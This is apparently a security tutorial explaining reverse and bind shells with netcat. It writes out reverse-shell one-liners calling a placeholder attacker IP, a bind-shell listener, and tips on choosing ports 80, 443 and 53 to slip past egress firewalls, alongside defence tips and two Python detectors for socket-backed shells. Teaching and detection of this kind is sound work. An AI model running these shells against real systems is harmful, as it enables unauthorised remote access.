Reverse Shell vs Bind Shell ft. Netcat

Sundaram G

Analogy:

Imagine you're locked outside your house (the attacker's machine), and the only way in is for someone inside (the target machine) to call you and leave the door open. That's a reverse shell.

But what if you could just tell the house to open its door and wait for you to enter? That’s a bind shell.


What’s the Goal?

The attacker wants remote command execution: the ability to run commands on the target system as if they were sitting at its terminal. Two common ways to get it:

  • Reverse Shell: The target connects back to the attacker.

  • Bind Shell: The target listens on a port; the attacker connects in.


What is Netcat?

netcat (or nc) is a Swiss army knife for TCP/IP. It can:

  • Connect to ports

  • Listen on ports

  • Transfer files

  • Act as a simple chat client

  • Create shells!


Reverse Shell

Setup:

  • The attacker sets up a listener on a specific port.

  • The target initiates a connection to the attacker and sends over a shell.

On Attacker Machine:

nc -lvnp 4444

What it means:

  • -l : listen mode

  • -v : verbose (see what's happening)

  • -n : numeric only, no DNS lookups (avoids waiting on name resolution)

  • -p 4444 : listen on port 4444

When the victim runs the command below, you get their shell in your terminal!

On Target Machine:

nc <attacker_ip> 4444 -e /bin/bash

What it does:

  • nc: runs Netcat

  • <attacker_ip>: IP of the attacker machine

  • 4444: port to connect to

  • -e /bin/bash: executes /bin/bash with its stdin, stdout and stderr attached to the connection

Note: In many modern systems, netcat is compiled without the -e option for security reasons.

Alternative (On Target):

bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1

Breaking Down the above command:

  • bash -i: starts an interactive shell

  • >& /dev/tcp/...: sends stdout and stderr to the TCP connection

  • 0>&1: redirects stdin from the same socket that stdout now points to, so input also arrives over the connection (bidirectional shell).

One thing to keep in mind is that the redirections are applied first; bash -i only starts once all three file descriptors already point at the connection.
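Those three descriptors are also the most reliable host-side indicator of both variants: a shell whose fd 0, 1 and 2 are a socket rather than a terminal or pipe. The following script is an added example (not part of the original article and not the author's code) that inspects /proc for exactly that and enriches each hit with the peer address from /proc/net/tcp. Assumptions: a Linux /proc layout, a little-endian host (which determines how /proc/net/tcp encodes addresses), IPv4 only (/proc/net/tcp6 is not parsed), the SHELL_NAMES list, and the constructed sample data (203.0.113.10 is a documentation address).

```python
import os
import re

# Process names whose stdio should never be a network socket on a normal host.
# This list is an assumption for the example, not a vetted signature set.
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat"}
SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")  # /proc/<pid>/fd/N -> socket:[inode]
TCP_ESTABLISHED = "01"  # value of the 'st' column in /proc/net/tcp


def hex_to_ipv4(hexaddr):
    """Decode a /proc/net/tcp address field (hex, host byte order; little-endian assumed)."""
    return ".".join(str(int(hexaddr[i:i + 2], 16)) for i in (6, 4, 2, 0))


def parse_proc_net_tcp(text):
    """Map socket inode -> (local 'ip:port', remote 'ip:port', state) for IPv4 TCP sockets."""
    table = {}
    for line in text.splitlines()[1:]:  # the first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        local, remote, state, inode = fields[1], fields[2], fields[3], fields[9]
        laddr, lport = local.split(":")
        raddr, rport = remote.split(":")
        table[inode] = (f"{hex_to_ipv4(laddr)}:{int(lport, 16)}",
                        f"{hex_to_ipv4(raddr)}:{int(rport, 16)}", state)
    return table


def socket_backed_shells(processes, tcp_table):
    """processes: {pid: (comm, {fd_number: symlink_target})}.

    Returns one finding per (shell process, socket inode) where fd 0, 1 or 2
    is a socket; the peer is filled in when the inode is a TCP socket.
    """
    findings = []
    for pid, (comm, fds) in sorted(processes.items()):
        if comm not in SHELL_NAMES:
            continue
        inodes = set()
        for fd in (0, 1, 2):
            match = SOCKET_LINK.match(fds.get(fd, ""))
            if match:
                inodes.add(match.group(1))
        for inode in sorted(inodes):
            local, remote, state = tcp_table.get(inode, ("?", "?", "?"))
            findings.append({"pid": pid, "comm": comm, "local": local, "remote": remote,
                             "established": state == TCP_ESTABLISHED})
    return findings


def snapshot_proc(root="/proc"):
    """Collect comm and the fd 0-2 link targets of every readable process (Linux only)."""
    processes = {}
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(root, entry, "comm")) as fh:
                comm = fh.read().strip()
        except OSError:
            continue  # process exited between listdir and open
        fds = {}
        for n in (0, 1, 2):
            try:
                fds[n] = os.readlink(os.path.join(root, entry, "fd", str(n)))
            except OSError:
                pass  # fd closed, or another user's fd table (needs root to read)
        processes[int(entry)] = (comm, fds)
    with open(os.path.join(root, "net", "tcp")) as fh:
        tcp_table = parse_proc_net_tcp(fh.read())
    return processes, tcp_table


# Constructed sample: pid 1337 is a bash whose stdio is a TCP socket to 203.0.113.10:443,
# pid 2048 is a normal interactive shell on a pty, pid 3001 is a daemon (not a shell)
# that happens to have a socket on stderr.
SAMPLE_PROCESSES = {
    1337: ("bash", {0: "socket:[40001]", 1: "socket:[40001]", 2: "socket:[40001]"}),
    2048: ("bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    3001: ("sshd", {0: "/dev/null", 1: "/dev/null", 2: "socket:[40002]"}),
}
SAMPLE_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0500000A:C350 0A7100CB:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 40001 1 0000000000000000 20 4 30 10 -1\n"
    "   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 40002 1 0000000000000000 100 0 0 10 0\n"
)


def demo():
    """Run the detector over the constructed sample."""
    return socket_backed_shells(SAMPLE_PROCESSES, parse_proc_net_tcp(SAMPLE_NET_TCP))


if __name__ == "__main__":
    for finding in demo():
        print("sample:", finding)
    if os.path.isdir("/proc/net"):
        for finding in socket_backed_shells(*snapshot_proc()):
            print("live:", finding)
```

Run it as root to see every process's fd table; unprivileged, only your own processes are visible. A finding with established set to True and a remote address outside the network you expect is worth an immediate look, whichever port the shell used.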


Bind Shell

Setup:

  • The target sets up a listener on a specific port.

  • The attacker initiates a connection to the target and receives a shell.

On Attacker Machine:

nc <victim_ip> 4444

The attacker connects to the victim's IP on the specified port.

On Target Machine:

nc -lvnp 4444 -e /bin/bash

Target is saying:
"I'm listening on port 4444. If someone connects, they get my Bash shell."

Note: Use the alternative way if the -e option is blocked.


Defense Tips

  • Monitor outgoing connections to strange IPs.

  • Use firewalls to block unauthorized traffic (both inbound and outbound).

  • Remove or restrict nc (especially builds that support -e) and socat where they are not needed.

  • Use EDR tools to detect suspicious shell behavior.


Firewall Considerations: Reverse vs Bind Shell

Let’s talk firewalls - the digital bouncers of the network world.

When you're setting up a reverse shell or a bind shell, firewall behavior plays a huge role in whether your connection will succeed or get silently dropped.

Reverse Shell

You (the attacker) listen, and the victim connects out to you.

  • The victim machine is initiating an outbound connection, and outbound traffic is usually allowed by default on most firewalls.

  • So, you should pick commonly allowed ports like:

    • 80 (HTTP)

    • 443 (HTTPS)

    • 53 (DNS)

These ports are less suspicious and more likely to sail past restrictive egress filters.

Why it works:

  • Outbound connections are needed for daily stuff (browsing, updates), so they’re rarely blocked.

  • Firewalls usually don’t mind if a user connects out to the internet but hate when something tries to get in.

Bind Shell

The victim opens a port and waits — and you connect in.

Sounds simple, but...

  • Most systems block incoming traffic unless you explicitly allow it.

  • Victims behind NAT, routers, or corporate firewalls? Yeah, good luck reaching them directly.

  • You could try to be sneaky by binding to 80 or 443, but:

    • You might clash with existing services (like web servers).

    • Ingress filtering still might kill the connection.

Why it usually fails:

  • Inbound traffic is seen as more dangerous.

  • Unless the firewall/NAT is configured to forward your connection, it gets dropped.


Real-World Tip:

When in doubt — go reverse. It’s more reliable, more stealthy, and plays nice with firewalls.
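The firewall discussion above is also the defender's lesson: a port-only egress filter passes a reverse shell on 443 or 53 just as happily as a browser, so detection has to pair the port with the process that owns the socket, and a shell or netcat in LISTEN state is the bind-shell counterpart. The script below is an added example (not from the original article) that applies that pairing to `ss -tanp` output; it serves both the Defense Tips list and this firewall section. Assumptions: the iproute2 `ss` column layout with `-tanp` (State, Recv-Q, Send-Q, Local:Port, Peer:Port, Process), the SHELL_LIKE list and EGRESS_ALLOWED_PORTS set, and constructed sample rows using documentation addresses.

```python
import re
import sys

# Processes that should not own network sockets on a typical host.
# This list is an assumption for the example, not a vetted signature set.
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat"}
# Ports a port-only egress filter typically leaves open (the article's 80/443/53).
EGRESS_ALLOWED_PORTS = {80, 443, 53}

# One data row of `ss -tanp`:
#   State Recv-Q Send-Q Local:Port Peer:Port users:(("comm",pid=N,fd=N))
SS_ROW = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+"
    r"(?P<laddr>\S+):(?P<lport>\d+|\*)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s+"
    r'users:\(\("(?P<comm>[^"]+)",pid=(?P<pid>\d+),fd=(?P<fd>\d+)\)'
)


def parse_ss(text):
    """Parse `ss -tanp` output into dicts; the header and rows without users:() are skipped."""
    rows = []
    for line in text.splitlines():
        match = SS_ROW.match(line.strip())
        if not match:
            continue
        row = match.groupdict()
        row["pid"], row["fd"] = int(row["pid"]), int(row["fd"])
        row["lport"] = None if row["lport"] == "*" else int(row["lport"])
        row["rport"] = None if row["rport"] == "*" else int(row["rport"])
        rows.append(row)
    return rows


def assess(rows):
    """Return one finding per socket owned by a shell-like process."""
    findings = []
    for row in rows:
        if row["comm"] not in SHELL_LIKE:
            continue
        base = {"pid": row["pid"], "comm": row["comm"],
                # fd 0/1/2 on the socket means the process's stdio *is* the connection
                "stdio_attached": row["fd"] <= 2}
        if row["state"] == "LISTEN":
            findings.append({**base, "kind": "bind-shell listener",
                             "endpoint": f"{row['laddr']}:{row['lport']}"})
        elif row["state"] == "ESTAB":
            findings.append({**base, "kind": "reverse-shell candidate",
                             "endpoint": f"{row['raddr']}:{row['rport']}",
                             # True: a port-only egress rule would have let this through
                             "egress_port_allowed": row["rport"] in EGRESS_ALLOWED_PORTS})
    return findings


# Constructed sample output. 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB  0      0      10.0.0.5:50000      203.0.113.10:443   users:(("bash",pid=1337,fd=0))
ESTAB  0      0      10.0.0.5:50001      203.0.113.20:443   users:(("firefox",pid=2100,fd=51))
ESTAB  0      0      10.0.0.5:50002      198.51.100.7:53    users:(("sh",pid=4100,fd=1))
ESTAB  0      0      10.0.0.5:50003      198.51.100.9:8080  users:(("nc",pid=4200,fd=3))
LISTEN 0      1      0.0.0.0:4444        0.0.0.0:*          users:(("nc",pid=5150,fd=3))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=800,fd=3))
"""


def demo():
    """Assess the constructed sample."""
    return assess(parse_ss(SAMPLE_SS))


if __name__ == "__main__":
    # Pipe live output in (`ss -tanp | python3 shell_sockets.py`); with no pipe, use the sample.
    text = SAMPLE_SS if sys.stdin.isatty() else sys.stdin.read()
    for finding in assess(parse_ss(text)):
        print(finding)
```

In the sample, the bash on 443 and the sh on 53 both come back with egress_port_allowed set to True: the same choice of port that lets the reverse shell out is what makes a port-only rule useless against it, which is why the finding is keyed on the owning process and on stdio_attached rather than on the port.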

In the next article we will use Socat (superior to netcat) for the same task: [SOCAT SUPREMACY]
